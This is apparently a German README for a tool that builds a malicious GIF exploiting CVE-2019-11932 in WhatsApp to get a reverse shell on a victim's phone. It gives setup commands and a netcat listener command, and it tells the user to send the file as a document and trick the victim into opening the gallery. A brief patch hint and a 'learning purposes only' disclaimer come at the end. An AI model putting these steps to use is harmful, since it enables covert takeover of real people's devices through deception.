WhatsPayloadRCE
Dies ist ein automatisch generiertes Payload für CVE-2019-11932 (WhatsApp Remote Code Execution)
- Automatische Installation von GCC (harmloser Befehl, du kannst sehen, dass dies Open-Source ist)
- Speichern als .GIF-Datei
Wie benutzt man?
sudo apt install git
git clone https://github.com/Err0r-ICA/WhatsPayloadRCE
cd WhatsPayloadRCE && bash start
Screenshot

Wie bekomme ich eine Shell?
- Du sendest dem Opfer einfach die .GIF-Datei ALS DOKUMENT, NICHT ALS BILD
- Und setze nc / netcat auf den Port, den du in den WhatsRCE-Tools festgelegt hast {nc -lnvp your_port}
- Du kannst den Social-Engineering-Angriff nutzen, damit Opfer dazu verleitet werden, diesen Exploit zu starten
- Sage dem Opfer, es soll die Galerie über WhatsApp öffnen und das Opfer dazu bringen, ein beliebiges Foto zu senden. Danach erhältst du wenige Sekunden später eine Shell-Verbindung vom Opfer
Wie kann man diesen Angriff vermeiden?
- Aktualisiere dein WhatsApp auf die neueste Version (in Version 2.19.244 gepatcht)
- Wie man Dateien, einschließlich Audio, Bildern und anderem, von Personen empfängt, die wir nicht kennen
Dies dient nur zu Lernzwecken; für Konsequenzen usw., wenn du es für eine Straftat verwendest, bin ich nicht verantwortlich!
Meine Konten



